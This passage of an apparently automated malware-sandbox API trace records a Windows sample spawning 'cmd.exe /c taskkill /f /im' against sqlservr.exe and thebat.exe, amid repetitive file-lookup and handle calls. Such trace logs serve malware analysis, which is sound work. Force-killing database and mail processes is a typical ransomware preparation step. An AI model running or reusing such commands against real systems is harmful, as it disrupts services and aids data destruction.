lpCommandLine="cmd.exe /c \"taskkill /f /im sqlservr.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x130, hThread=0x158, dwProcessId=0x4b4, dwThreadId=0x13dc)) returned 1 [0219.175] CloseHandle (hObject=0x158) returned 1 [0219.175] CloseHandle (hObject=0x154) returned 1 [0219.175] CloseHandle (hObject=0x144) returned 1 [0219.175] CloseHandle (hObject=0x140) returned 1 [0219.176] CloseHandle (hObject=0x13c) returned 1 [0219.176] CloseHandle (hObject=0x138) returned 1 [0219.176] CloseHandle (hObject=0x134) returned 1 [0219.176] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0222.371] SetEvent (hEvent=0x150) returned 1 [0222.372] GetExitCodeProcess (in: hProcess=0x130, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0222.372] GetProcessTimes (in: hProcess=0x130, lpCreationTime=0x1249f3e0, lpExitTime=0x1249f3e8, lpKernelTime=0x1249f3f0, lpUserTime=0x1249f3f8 | out: lpCreationTime=0x1249f3e0, lpExitTime=0x1249f3e8, lpKernelTime=0x1249f3f0, lpUserTime=0x1249f3f8) returned 1 [0222.372] CloseHandle (hObject=0x130) returned 1 [0222.373] SetEvent (hEvent=0x128) returned 1 [0222.373] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0222.395] SetEvent (hEvent=0x128) returned 1 [0222.395] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248ad00, nSize=0x64 | out: lpBuffer="") returned 0x35 [0222.395] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2f08 | out: lpFileInformation=0x124a2f08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.396] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.396] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a2f58 | out: lpFileInformation=0x124a2f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.396] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.396] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2fa8 | out: lpFileInformation=0x124a2fa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.396] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.396] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a2ff8 | out: lpFileInformation=0x124a2ff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a3048 | out: lpFileInformation=0x124a3048*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a3098 | out: lpFileInformation=0x124a3098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a30e8 | out: lpFileInformation=0x124a30e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a3138 | out: lpFileInformation=0x124a3138*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a3188 | out: lpFileInformation=0x124a3188*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.397] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.397] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a31d8 | out: lpFileInformation=0x124a31d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.398] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.398] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a3228 | out: lpFileInformation=0x124a3228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.398] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.398] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a3278 | out: lpFileInformation=0x124a3278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0222.398] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0222.398] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248add0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0222.398] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a32c8 | out: lpFileInformation=0x124a32c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0222.398] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248aea0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0222.398] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3318 | out: lpFileInformation=0x124a3318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0222.399] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0222.399] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0222.399] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0222.399] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0222.399] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0222.399] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0222.399] GetEnvironmentStringsW () returned 0x8ea900* [0222.400] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0222.400] GetCurrentProcess () returned 0xffffffff [0222.400] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8eb0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8eb0*=0x13c) returned 1 [0222.400] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8eb4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8eb4*=0x140) returned 1 [0222.400] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8eb8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8eb8*=0x144) returned 1 [0222.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im thebat.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124dc000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x13c, hStdOutput=0x140, hStdError=0x144), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im thebat.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x158, hThread=0x154, dwProcessId=0xdf0, dwThreadId=0xe38)) returned 1 [0222.429] CloseHandle (hObject=0x154) returned 1 [0222.429] CloseHandle (hObject=0x144) returned 1 [0222.429] CloseHandle (hObject=0x140) returned 1 [0222.429] CloseHandle (hObject=0x13c) returned 1 [0222.429] CloseHandle (hObject=0x130) returned 1 [0222.429] CloseHandle (hObject=0x134) returned 1 [0222.429] CloseHandle (hObject=0x138) returned 1 [0222.429] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0xffffffff) returned 0x0 [0223.674] SetEvent (hEvent=0x150) returned 1 [0223.674] GetExitCodeProcess (in: hProcess=0x158, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0223.674] GetProcessTimes (in: hProcess=0x158, lpCreationTime=0x124a79e0, lpExitTime=0x124a79e8, lpKernelTime=0x124a79f0, lpUserTime=0x124a79f8 | out: lpCreationTime=0x124a79e0, lpExitTime=0x124a79e8, lpKernelTime=0x124a79f0, lpUserTime=0x124a79f8) returned 1 [0223.674] CloseHandle (hObject=0x158) returned 1 [0223.681] SetEvent (hEvent=0x128) returned 1 [0223.681] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0223.689] SetEvent (hEvent=0x150) returned 1 [0223.689] SetEvent (hEvent=0x128) returned 1 [0223.689] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247cdd0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0223.690] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496f58 | out: lpFileInformation=0x12496f58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.690] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.690] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12496fa8 | out: lpFileInformation=0x12496fa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.690] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.690] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496ff8 | out: lpFileInformation=0x12496ff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.690] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.690] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12497048 | out: lpFileInformation=0x12497048*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.691] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.691] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12497098 | out: lpFileInformation=0x12497098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.691] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124970e8 | out: lpFileInformation=0x124970e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.692] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12497138 | out: lpFileInformation=0x12497138*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.692] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12497188 | out: lpFileInformation=0x12497188*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.692] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124971d8 | out: lpFileInformation=0x124971d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.692] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12497228 | out: lpFileInformation=0x12497228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.692] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.692] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12497278 | out: lpFileInformation=0x12497278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0223.693] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.693] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124972c8 | out: lpFileInformation=0x124972c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 